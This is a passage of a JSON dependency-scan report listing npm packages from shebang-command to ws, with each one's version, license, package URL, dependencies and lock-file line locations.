"pkg:npm/shebang-command@2.0.0", "UID": "5b52936c644444e0" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "shebang-regex@3.0.0" ], "Locations": [ { "StartLine": 8946, "EndLine": 8957 } ], "AnalyzedBy": "npm" }, { "ID": "shebang-regex@3.0.0", "Name": "shebang-regex", "Identifier": { "PURL": "pkg:npm/shebang-regex@3.0.0", "UID": "c3018a2ce9684e2f" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8958, "EndLine": 8966 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel@1.1.0", "Name": "side-channel", "Identifier": { "PURL": "pkg:npm/side-channel@1.1.0", "UID": "958c2872b017e013" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "object-inspect@1.13.4", "side-channel-list@1.0.1", "side-channel-map@1.0.1", "side-channel-weakmap@1.0.2" ], "Locations": [ { "StartLine": 8967, "EndLine": 8985 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-list@1.0.1", "Name": "side-channel-list", "Identifier": { "PURL": "pkg:npm/side-channel-list@1.0.1", "UID": "3348403d671593e1" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "object-inspect@1.13.4" ], "Locations": [ { "StartLine": 8986, "EndLine": 9001 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-map@1.0.1", "Name": "side-channel-map", "Identifier": { "PURL": "pkg:npm/side-channel-map@1.0.1", "UID": "d0eb43c7321c2176" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "get-intrinsic@1.3.0", "object-inspect@1.13.4" ], "Locations": [ { "StartLine": 9002, "EndLine": 9019 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-weakmap@1.0.2", "Name": "side-channel-weakmap", "Identifier": { "PURL": "pkg:npm/side-channel-weakmap@1.0.2", "UID": "c258c19e799ad1e7" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "get-intrinsic@1.3.0", "object-inspect@1.13.4", "side-channel-map@1.0.1" ], "Locations": [ { "StartLine": 9020, "EndLine": 9038 } ], "AnalyzedBy": "npm" }, { "ID": "signal-exit@4.1.0", "Name": "signal-exit", "Identifier": { "PURL": "pkg:npm/signal-exit@4.1.0", "UID": "42b5a10c68d388e2" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9046, "EndLine": 9057 } ], "AnalyzedBy": "npm" }, { "ID": "simple-swizzle@0.2.4", "Name": "simple-swizzle", "Identifier": { "PURL": "pkg:npm/simple-swizzle@0.2.4", "UID": "f757de862bcdb059" }, "Version": "0.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-arrayish@0.3.4" ], "Locations": [ { "StartLine": 9058, "EndLine": 9066 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io@4.8.3", "Name": "socket.io", "Identifier": { "PURL": "pkg:npm/socket.io@4.8.3", "UID": "a880aa07e96682af" }, "Version": "4.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "accepts@1.3.8", "base64id@2.0.0", "cors@2.8.6", "debug@4.4.3", "engine.io@6.6.7", "socket.io-adapter@2.5.6", "socket.io-parser@4.2.6" ], "Locations": [ { "StartLine": 9067, "EndLine": 9084 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io-adapter@2.5.6", "Name": "socket.io-adapter", "Identifier": { "PURL": "pkg:npm/socket.io-adapter@2.5.6", "UID": "a837353f4bef1829" }, "Version": "2.5.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@4.4.3", "ws@8.18.3" ], "Locations": [ { "StartLine": 9085, "EndLine": 9094 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io-client@4.8.3", "Name": "socket.io-client", "Identifier": { "PURL": "pkg:npm/socket.io-client@4.8.3", "UID": "ea4537f38d6ba06" }, "Version": "4.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@socket.io/component-emitter@3.1.2", "debug@4.4.3", "engine.io-client@6.6.4", "socket.io-parser@4.2.6" ], "Locations": [ { "StartLine": 9095, "EndLine": 9109 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io-parser@4.2.6", "Name": "socket.io-parser", "Identifier": { "PURL": "pkg:npm/socket.io-parser@4.2.6", "UID": "34c86139cce8fc52" }, "Version": "4.2.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@socket.io/component-emitter@3.1.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 9110, "EndLine": 9122 } ], "AnalyzedBy": "npm" }, { "ID": "source-map-js@1.2.1", "Name": "source-map-js", "Identifier": { "PURL": "pkg:npm/source-map-js@1.2.1", "UID": "e8dbf1e4fc084630" }, "Version": "1.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9133, "EndLine": 9141 } ], "AnalyzedBy": "npm" }, { "ID": "standard-as-callback@2.1.0", "Name": "standard-as-callback", "Identifier": { "PURL": "pkg:npm/standard-as-callback@2.1.0", "UID": "fd3dbd9a9dea914f" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9160, "EndLine": 9165 } ], "AnalyzedBy": "npm" }, { "ID": "statuses@2.0.2", "Name": "statuses", "Identifier": { "PURL": "pkg:npm/statuses@2.0.2", "UID": "3328e330527b8834" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9166, "EndLine": 9174 } ], "AnalyzedBy": "npm" }, { "ID": "stream-events@1.0.5", "Name": "stream-events", "Identifier": { "PURL": "pkg:npm/stream-events@1.0.5", "UID": "9fdb8a677ebf060f" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stubs@3.0.0" ], "Locations": [ { "StartLine": 9182, "EndLine": 9191 } ], "AnalyzedBy": "npm" }, { "ID": "stream-shift@1.0.3", "Name": "stream-shift", "Identifier": { "PURL": "pkg:npm/stream-shift@1.0.3", "UID": "79153b88c4da8a8d" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9192, "EndLine": 9198 } ], "AnalyzedBy": "npm" }, { "ID": "streamsearch@1.1.0", "Name": "streamsearch", "Identifier": { "PURL": "pkg:npm/streamsearch@1.1.0", "UID": "663bce4573809080" }, "Version": "1.1.0", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9199, "EndLine": 9206 } ], "AnalyzedBy": "npm" }, { "ID": "string-width@4.2.3", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@4.2.3", "UID": "bbdbc8676d33f385" }, "Version": "4.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "emoji-regex@8.0.0", "is-fullwidth-code-point@3.0.0", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 9216, "EndLine": 9229 }, { "StartLine": 9230, "EndLine": 9244 } ], "AnalyzedBy": "npm" }, { "ID": "string-width@5.1.2", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@5.1.2", "UID": "189318739c4d2fa5" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "eastasianwidth@0.2.0", "emoji-regex@9.2.2", "strip-ansi@7.2.0" ], "Locations": [ { "StartLine": 1468, "EndLine": 1484 } ], "AnalyzedBy": "npm" }, { "ID": "string_decoder@1.1.1", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.1.1", "UID": "32be7d98a729cb51" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.1.2" ], "Locations": [ { "StartLine": 4179, "EndLine": 4187 } ], "AnalyzedBy": "npm" }, { "ID": "string_decoder@1.3.0", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.3.0", "UID": "9d93dd9a6723328f" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 9207, "EndLine": 9215 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@6.0.1", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@6.0.1", "UID": "a135b828b1a553d1" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@5.0.1" ], "Locations": [ { "StartLine": 9257, "EndLine": 9268 }, { "StartLine": 9269, "EndLine": 9281 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@7.2.0", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@7.2.0", "UID": "5603a85cb1f5c87d" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@6.2.2" ], "Locations": [ { "StartLine": 1485, "EndLine": 1499 } ], "AnalyzedBy": "npm" }, { "ID": "strnum@2.2.3", "Name": "strnum", "Identifier": { "PURL": "pkg:npm/strnum@2.2.3", "UID": "3aa1e0293b0f0065" }, "Version": "2.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9338, "EndLine": 9350 } ], "AnalyzedBy": "npm" }, { "ID": "stubs@3.0.0", "Name": "stubs", "Identifier": { "PURL": "pkg:npm/stubs@3.0.0", "UID": "ecbb2921dec5dff" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9351, "EndLine": 9357 } ], "AnalyzedBy": "npm" }, { "ID": "styled-jsx@5.1.1", "Name": "styled-jsx", "Identifier": { "PURL": "pkg:npm/styled-jsx@5.1.1", "UID": "f679f63430c0027f" }, "Version": "5.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "client-only@0.0.1", "react@18.3.1" ], "Locations": [ { "StartLine": 9358, "EndLine": 9380 } ], "AnalyzedBy": "npm" }, { "ID": "sucrase@3.35.1", "Name": "sucrase", "Identifier": { "PURL": "pkg:npm/sucrase@3.35.1", "UID": "dc031349a3613c9f" }, "Version": "3.35.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/gen-mapping@0.3.13", "commander@4.1.1", "lines-and-columns@1.2.4", "mz@2.7.0", "pirates@4.0.7", "tinyglobby@0.2.16", "ts-interface-checker@0.1.13" ], "Locations": [ { "StartLine": 9381, "EndLine": 9402 } ], "AnalyzedBy": "npm" }, { "ID": "supports-preserve-symlinks-flag@1.0.0", "Name": "supports-preserve-symlinks-flag", "Identifier": { "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", "UID": "443b0e457d1229a0" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9501, "EndLine": 9512 } ], "AnalyzedBy": "npm" }, { "ID": "svg-arc-to-cubic-bezier@3.2.0", "Name": "svg-arc-to-cubic-bezier", "Identifier": { "PURL": "pkg:npm/svg-arc-to-cubic-bezier@3.2.0", "UID": "bb7c6945c3c74800" }, "Version": "3.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9513, "EndLine": 9518 } ], "AnalyzedBy": "npm" }, { "ID": "swagger-ui-dist@5.32.6", "Name": "swagger-ui-dist", "Identifier": { "PURL": "pkg:npm/swagger-ui-dist@5.32.6", "UID": "6bd94cefa195198d" }, "Version": "5.32.6", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@scarf/scarf@1.4.0" ], "Locations": [ { "StartLine": 9519, "EndLine": 9527 } ], "AnalyzedBy": "npm" }, { "ID": "swagger-ui-express@5.0.1", "Name": "swagger-ui-express", "Identifier": { "PURL": "pkg:npm/swagger-ui-express@5.0.1", "UID": "366d31b1a12dfada" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "express@4.22.1", "swagger-ui-dist@5.32.6" ], "Locations": [ { "StartLine": 9528, "EndLine": 9542 } ], "AnalyzedBy": "npm" }, { "ID": "tailwindcss@3.4.19", "Name": "tailwindcss", "Identifier": { "PURL": "pkg:npm/tailwindcss@3.4.19", "UID": "bcaf508ae7befb5a" }, "Version": "3.4.19", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@alloc/quick-lru@5.2.0", "arg@5.0.2", "chokidar@3.6.0", "didyoumean@1.2.2", "dlv@1.1.3", "fast-glob@3.3.3", "glob-parent@6.0.2", "is-glob@4.0.3", "jiti@1.21.7", "lilconfig@3.1.3", "micromatch@4.0.8", "normalize-path@3.0.0", "object-hash@3.0.0", "picocolors@1.1.1", "postcss-import@15.1.0", "postcss-js@4.1.0", "postcss-load-config@6.0.1", "postcss-nested@6.2.0", "postcss-selector-parser@6.1.2", "postcss@8.5.12", "resolve@1.22.12", "sucrase@3.35.1" ], "Locations": [ { "StartLine": 9543, "EndLine": 9579 } ], "AnalyzedBy": "npm" }, { "ID": "teeny-request@9.0.0", "Name": "teeny-request", "Identifier": { "PURL": "pkg:npm/teeny-request@9.0.0", "UID": "410cf71ec1aee73d" }, "Version": "9.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "http-proxy-agent@5.0.0", "https-proxy-agent@5.0.1", "node-fetch@2.7.0", "stream-events@1.0.5", "uuid@9.0.1" ], "Locations": [ { "StartLine": 9580, "EndLine": 9596 } ], "AnalyzedBy": "npm" }, { "ID": "thenify@3.3.1", "Name": "thenify", "Identifier": { "PURL": "pkg:npm/thenify@3.3.1", "UID": "af56b07a8a30f283" }, "Version": "3.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "any-promise@1.3.0" ], "Locations": [ { "StartLine": 9646, "EndLine": 9654 } ], "AnalyzedBy": "npm" }, { "ID": "thenify-all@1.6.0", "Name": "thenify-all", "Identifier": { "PURL": "pkg:npm/thenify-all@1.6.0", "UID": "8b86266e612ded9a" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "thenify@3.3.1" ], "Locations": [ { "StartLine": 9655, "EndLine": 9666 } ], "AnalyzedBy": "npm" }, { "ID": "thirty-two@1.0.2", "Name": "thirty-two", "Identifier": { "PURL": "pkg:npm/thirty-two@1.0.2", "UID": "972bf9550469fb2a" }, "Version": "1.0.2", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9667, "EndLine": 9674 } ], "AnalyzedBy": "npm" }, { "ID": "tiny-inflate@1.0.3", "Name": "tiny-inflate", "Identifier": { "PURL": "pkg:npm/tiny-inflate@1.0.3", "UID": "5bb1f1c655ebfefa" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9675, "EndLine": 9680 } ], "AnalyzedBy": "npm" }, { "ID": "tiny-invariant@1.3.3", "Name": "tiny-invariant", "Identifier": { "PURL": "pkg:npm/tiny-invariant@1.3.3", "UID": "64a2cc008f6037cf" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9681, "EndLine": 9686 } ], "AnalyzedBy": "npm" }, { "ID": "tinyglobby@0.2.16", "Name": "tinyglobby", "Identifier": { "PURL": "pkg:npm/tinyglobby@0.2.16", "UID": "643b1603c2c312fe" }, "Version": "0.2.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fdir@6.5.0", "picomatch@4.0.4" ], "Locations": [ { "StartLine": 9694, "EndLine": 9709 } ], "AnalyzedBy": "npm" }, { "ID": "to-regex-range@5.0.1", "Name": "to-regex-range", "Identifier": { "PURL": "pkg:npm/to-regex-range@5.0.1", "UID": "dce6683ac56c2cb8" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-number@7.0.0" ], "Locations": [ { "StartLine": 9759, "EndLine": 9770 } ], "AnalyzedBy": "npm" }, { "ID": "toidentifier@1.0.1", "Name": "toidentifier", "Identifier": { "PURL": "pkg:npm/toidentifier@1.0.1", "UID": "5dcb7a047e2a9c0a" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9771, "EndLine": 9779 } ], "AnalyzedBy": "npm" }, { "ID": "tr46@0.0.3", "Name": "tr46", "Identifier": { "PURL": "pkg:npm/tr46@0.0.3", "UID": "57e38f91fc86bbaf" }, "Version": "0.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9780, "EndLine": 9785 } ], "AnalyzedBy": "npm" }, { "ID": "ts-interface-checker@0.1.13", "Name": "ts-interface-checker", "Identifier": { "PURL": "pkg:npm/ts-interface-checker@0.1.13", "UID": "ea627d1dce8f1eda" }, "Version": "0.1.13", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9796, "EndLine": 9801 } ], "AnalyzedBy": "npm" }, { "ID": "tslib@2.4.1", "Name": "tslib", "Identifier": { "PURL": "pkg:npm/tslib@2.4.1", "UID": "938eb7dd47d57366" }, "Version": "2.4.1", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9938, "EndLine": 9943 } ], "AnalyzedBy": "npm" }, { "ID": "tslib@2.8.1", "Name": "tslib", "Identifier": { "PURL": "pkg:npm/tslib@2.8.1", "UID": "7d448d88841bb7c9" }, "Version": "2.8.1", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2746, "EndLine": 2751 } ], "AnalyzedBy": "npm" }, { "ID": "twilio@5.13.1", "Name": "twilio", "Identifier": { "PURL": "pkg:npm/twilio@5.13.1", "UID": "e506e058cde5eddc" }, "Version": "5.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "axios@1.15.2", "dayjs@1.11.20", "https-proxy-agent@5.0.1", "jsonwebtoken@9.0.3", "qs@6.14.2", "scmp@2.1.0", "xmlbuilder@13.0.2" ], "Locations": [ { "StartLine": 10046, "EndLine": 10063 } ], "AnalyzedBy": "npm" }, { "ID": "type-is@1.6.18", "Name": "type-is", "Identifier": { "PURL": "pkg:npm/type-is@1.6.18", "UID": "c25461935b074dde" }, "Version": "1.6.18", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "media-typer@0.3.0", "mime-types@2.1.35" ], "Locations": [ { "StartLine": 10125, "EndLine": 10137 } ], "AnalyzedBy": "npm" }, { "ID": "typedarray@0.0.6", "Name": "typedarray", "Identifier": { "PURL": "pkg:npm/typedarray@0.0.6", "UID": "63554f9897990a29" }, "Version": "0.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10138, "EndLine": 10143 } ], "AnalyzedBy": "npm" }, { "ID": "undici-types@6.21.0", "Name": "undici-types", "Identifier": { "PURL": "pkg:npm/undici-types@6.21.0", "UID": "f614ce5674228d65" }, "Version": "6.21.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10165, "EndLine": 10170 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-properties@1.4.1", "Name": "unicode-properties", "Identifier": { "PURL": "pkg:npm/unicode-properties@1.4.1", "UID": "a913907ac4615bcc" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "unicode-trie@2.0.0" ], "Locations": [ { "StartLine": 10171, "EndLine": 10180 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-trie@2.0.0", "Name": "unicode-trie", "Identifier": { "PURL": "pkg:npm/unicode-trie@2.0.0", "UID": "517e67a099841716" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "pako@0.2.9", "tiny-inflate@1.0.3" ], "Locations": [ { "StartLine": 10181, "EndLine": 10190 } ], "AnalyzedBy": "npm" }, { "ID": "unpipe@1.0.0", "Name": "unpipe", "Identifier": { "PURL": "pkg:npm/unpipe@1.0.0", "UID": "85162f7d71412aff" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10197, "EndLine": 10205 } ], "AnalyzedBy": "npm" }, { "ID": "update-browserslist-db@1.2.3", "Name": "update-browserslist-db", "Identifier": { "PURL": "pkg:npm/update-browserslist-db@1.2.3", "UID": "1760f655314ca94" }, "Version": "1.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserslist@4.28.2", "escalade@3.2.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 10206, "EndLine": 10235 } ], "AnalyzedBy": "npm" }, { "ID": "util-deprecate@1.0.2", "Name": "util-deprecate", "Identifier": { "PURL": "pkg:npm/util-deprecate@1.0.2", "UID": "dc2ba32c061c2bbd" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10246, "EndLine": 10251 } ], "AnalyzedBy": "npm" }, { "ID": "utils-merge@1.0.1", "Name": "utils-merge", "Identifier": { "PURL": "pkg:npm/utils-merge@1.0.1", "UID": "308fe9693a5f5a4b" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10252, "EndLine": 10260 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@10.0.0", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@10.0.0", "UID": "3aebb3e4d3409ba3" }, "Version": "10.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10261, "EndLine": 10274 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@8.3.2", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@8.3.2", "UID": "6e5d7e5bc86220f1" }, "Version": "8.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 849, "EndLine": 859 }, { "StartLine": 7352, "EndLine": 7361 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@9.0.1", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@9.0.1", "UID": "f9285e1af833eb69" }, "Version": "9.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5759, "EndLine": 5773 }, { "StartLine": 5950, "EndLine": 5964 }, { "StartLine": 9624, "EndLine": 9638 } ], "AnalyzedBy": "npm" }, { "ID": "vary@1.1.2", "Name": "vary", "Identifier": { "PURL": "pkg:npm/vary@1.1.2", "UID": "91872cb95e28b11c" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10282, "EndLine": 10290 } ], "AnalyzedBy": "npm" }, { "ID": "victory-vendor@36.9.2", "Name": "victory-vendor", "Identifier": { "PURL": "pkg:npm/victory-vendor@36.9.2", "UID": "468359c5deff04ec" }, "Version": "36.9.2", "Licenses": [ "MIT AND ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-array@3.2.2", "@types/d3-ease@3.0.2", "@types/d3-interpolate@3.0.4", "@types/d3-scale@4.0.9", "@types/d3-shape@3.1.8", "@types/d3-time@3.0.4", "@types/d3-timer@3.0.2", "d3-array@3.2.4", "d3-ease@3.0.1", "d3-interpolate@3.0.1", "d3-scale@4.0.2", "d3-shape@3.2.0", "d3-time@3.1.0", "d3-timer@3.0.1" ], "Locations": [ { "StartLine": 10291, "EndLine": 10312 } ], "AnalyzedBy": "npm" }, { "ID": "vite-compatible-readable-stream@3.6.1", "Name": "vite-compatible-readable-stream", "Identifier": { "PURL": "pkg:npm/vite-compatible-readable-stream@3.6.1", "UID": "70fc570869741b4c" }, "Version": "3.6.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "string_decoder@1.3.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 10373, "EndLine": 10386 } ], "AnalyzedBy": "npm" }, { "ID": "webidl-conversions@3.0.1", "Name": "webidl-conversions", "Identifier": { "PURL": "pkg:npm/webidl-conversions@3.0.1", "UID": "22cb78eaf3dd9e6a" }, "Version": "3.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10476, "EndLine": 10481 } ], "AnalyzedBy": "npm" }, { "ID": "websocket-driver@0.7.4", "Name": "websocket-driver", "Identifier": { "PURL": "pkg:npm/websocket-driver@0.7.4", "UID": "6904478a1f2775b9" }, "Version": "0.7.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "http-parser-js@0.5.10", "safe-buffer@5.2.1", "websocket-extensions@0.1.4" ], "Locations": [ { "StartLine": 10482, "EndLine": 10495 } ], "AnalyzedBy": "npm" }, { "ID": "websocket-extensions@0.1.4", "Name": "websocket-extensions", "Identifier": { "PURL": "pkg:npm/websocket-extensions@0.1.4", "UID": "856af7a2bf1b9abc" }, "Version": "0.1.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10496, "EndLine": 10504 } ], "AnalyzedBy": "npm" }, { "ID": "whatwg-url@5.0.0", "Name": "whatwg-url", "Identifier": { "PURL": "pkg:npm/whatwg-url@5.0.0", "UID": "9e7fb5dcbf1ebb28" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tr46@0.0.3", "webidl-conversions@3.0.1" ], "Locations": [ { "StartLine": 10505, "EndLine": 10514 } ], "AnalyzedBy": "npm" }, { "ID": "which@2.0.2", "Name": "which", "Identifier": { "PURL": "pkg:npm/which@2.0.2", "UID": "68a3a6f0695bf29e" }, "Version": "2.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "isexe@2.0.0" ], "Locations": [ { "StartLine": 10515, "EndLine": 10529 } ], "AnalyzedBy": "npm" }, { "ID": "which-module@2.0.1", "Name": "which-module", "Identifier": { "PURL": "pkg:npm/which-module@2.0.1", "UID": "ddaa14d081e0cac8" }, "Version": "2.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10530, "EndLine": 10535 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@6.2.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@6.2.0", "UID": "87624d39608594d3" }, "Version": "6.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 8254, "EndLine": 8267 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@7.0.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@7.0.0", "UID": "982d5a2039b6b58" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 10563, "EndLine": 10580 }, { "StartLine": 10581, "EndLine": 10598 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@8.1.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@8.1.0", "UID": "45114ad23571b894" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@6.2.3", "string-width@5.1.2", "strip-ansi@7.2.0" ], "Locations": [ { "StartLine": 1500, "EndLine": 1516 } ], "AnalyzedBy": "npm" }, { "ID": "wrappy@1.0.2", "Name": "wrappy", "Identifier": { "PURL": "pkg:npm/wrappy@1.0.2", "UID": "f1d07c8fd84add11" }, "Version": "1.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10599, "EndLine": 10605 } ], "AnalyzedBy": "npm" }, { "ID": "ws@8.18.3", "Name": "ws", "Identifier": { "PURL": "pkg:npm/ws@8.18.3", "UID": "eed5161b69f5e052" }, "Version": "8.18.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10606, "EndLine": 10626 } ], "AnalyzedBy": "npm" }, { "ID": "xmlbuilder@13.0.2", "Name": "xmlbuilder", "Identifier": { 